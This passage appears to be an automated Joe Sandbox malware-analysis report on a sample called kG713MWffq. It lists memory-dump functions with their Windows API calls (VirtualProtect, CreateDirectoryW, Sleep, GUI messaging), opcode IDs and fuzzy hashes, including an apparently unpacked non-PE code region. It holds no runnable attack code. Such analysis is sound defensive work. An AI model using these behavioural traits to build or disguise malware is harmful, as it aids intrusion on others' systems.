                                                                                          • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                        • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                        • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                        • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                        • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 00415012
                                                                                        • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2999321469-0
                                                                                        • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                        • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                        • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                        • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                        APIs
                                                                                          • Part of subcall function 03DBB318: GetFileAttributesW.KERNELBASE(?), ref: 03DBB323
                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000), ref: 03DBBBE9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1495454385.0000000003DBA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DBA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_3dba000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesCreateDirectoryFile
                                                                                        • String ID:
                                                                                        • API String ID: 3401506121-0
                                                                                        • Opcode ID: 478e348366bb424c91d63a9b7625135090382d94dceac9e5841913dba30a7303
                                                                                        • Instruction ID: d6817084e99031a42aa03d390fe5820ed2476174c8467ec9ecb194f77a8d1e88
                                                                                        • Opcode Fuzzy Hash: 478e348366bb424c91d63a9b7625135090382d94dceac9e5841913dba30a7303
                                                                                        • Instruction Fuzzy Hash: 60514135A10318D6EF14EFB0C854BEE7379EF58700F004569BA09EB290EB799B45CBA5
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 0dc2fc951f3a33477071b3777001db4296cbb315477624789133fea0400dd9e8
                                                                                        • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                        • Opcode Fuzzy Hash: 0dc2fc951f3a33477071b3777001db4296cbb315477624789133fea0400dd9e8
                                                                                        • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                        • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                        • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                        • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 4ce60ccdf1fc02583e70ba5d5e18dff6b69084b34d7bdf980496efa43948cae9
                                                                                        • Instruction ID: ba1a180a354307970ca5324e735c4d43e275f35ec71acda5bde6c4d397417e15
                                                                                        • Opcode Fuzzy Hash: 4ce60ccdf1fc02583e70ba5d5e18dff6b69084b34d7bdf980496efa43948cae9
                                                                                        • Instruction Fuzzy Hash: 4811A572A00614ABCB10EFB9C98585BB7E9EF44354710862AFC18E7741E635FD50CBD5
                                                                                        APIs
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • _memmove.LIBCMT ref: 00444B34
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _malloc_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1183979061-0
                                                                                        • Opcode ID: d58fa48e255ee436e37ff8a874cf1cde9b8dc76de314b36fe1ef5a184b0306f2
                                                                                        • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                                                        • Opcode Fuzzy Hash: d58fa48e255ee436e37ff8a874cf1cde9b8dc76de314b36fe1ef5a184b0306f2
                                                                                        • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 3031932315-0
                                                                                        • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                        • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                        • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                        • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                        APIs
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                        • _memmove.LIBCMT ref: 00428939
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 620504543-0
                                                                                        • Opcode ID: 97b7da95fdb4d93726fe5991dd87760478c4e3babf9d6c5bbf9f046df0adc2f4
                                                                                        • Instruction ID: c2064c2796ab03ff69418e3c62d92c7a192424b86f475a5c46dd96dfc8171558
                                                                                        • Opcode Fuzzy Hash: 97b7da95fdb4d93726fe5991dd87760478c4e3babf9d6c5bbf9f046df0adc2f4
                                                                                        • Instruction Fuzzy Hash: 27011DB46005509FDB00DF5DD891F5677A1AF8A308F14819DE2098F366DA36E846CB92
                                                                                        APIs
                                                                                          • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                          • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                                                                          • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                                                                                        • VariantClear.OLEAUT32(?), ref: 0047973E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$CopyInit
                                                                                        • String ID:
                                                                                        • API String ID: 24293632-0
                                                                                        • Opcode ID: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                                                                        • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                                                                                        • Opcode Fuzzy Hash: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                                                                        • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 03DBB323
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1495454385.0000000003DBA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DBA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_3dba000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                        • Instruction ID: 087b3df46c1973bc395a255c51b0a4717fef92053f96686746a3df96da8e31ba
                                                                                        • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                        • Instruction Fuzzy Hash: 3FE08C30D15208EBCB50CAA88D04AEE73B8EB04720F004666A847C3380D9B08A00D668
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 03DBB2F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1495454385.0000000003DBA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DBA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_3dba000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                        • Instruction ID: f6f042e40add7611a19354936d9b513db92111f95c7b77338200f27c0cd23084
                                                                                        • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                        • Instruction Fuzzy Hash: A5D05E3090520CEBCB10CAA49908ADD77A89B09321F404759E95683280D57199009764
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wfsopen
                                                                                        • String ID:
                                                                                        • API String ID: 197181222-0
                                                                                        • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                        • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                        • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                        • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000001F4), ref: 03DBCCF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1495454385.0000000003DBA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DBA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_3dba000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                        • Instruction ID: b7eb0a68b1b49bfc59774d855c2aa0eb5d88b25519356c1799072bb77fc97d7b
                                                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                        • Instruction Fuzzy Hash: A6E0BF7494010EEFDB00DFA8D5496DD7BB4FF04301F1005A1FD05D7680DB309E548A62
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000001F4), ref: 03DBCCF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1495454385.0000000003DBA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DBA000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_3dba000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction ID: e481a3549c1a41f1706986519624e1bc1ca80b841d92ac2ee293e1aa3285281c
                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction Fuzzy Hash: E2E0BF7494010EDFDB00DFA8D54969D7BB4EF04301F1001A1FD0192280D63099508A62
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                        • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                        • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                        • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                        • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                        • SendMessageW.USER32 ref: 0047CA7F
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                        • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(009D1B68,00000000,00000000,00000000), ref: 0047CB9B
                                                                                        • ImageList_BeginDrag.COMCTL32(009D1B68,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                        • SetCapture.USER32(?), ref: 0047CBB6
                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                        • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                        • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                        • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                        • SendMessageW.USER32 ref: 0047CD12
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                        • SendMessageW.USER32 ref: 0047CD80
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                        • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                        • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                        • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                        • SendMessageW.USER32 ref: 0047CE93
                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,02FC1B58,00000000,?,?,?,?), ref: 0047CF1C
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                        • SendMessageW.USER32 ref: 0047CF6B
                                                                                        • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,02FC1B58,00000000,?,?,?,?), ref: 0047CFE6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$F
                                                                                        • API String ID: 3100379633-4164748364
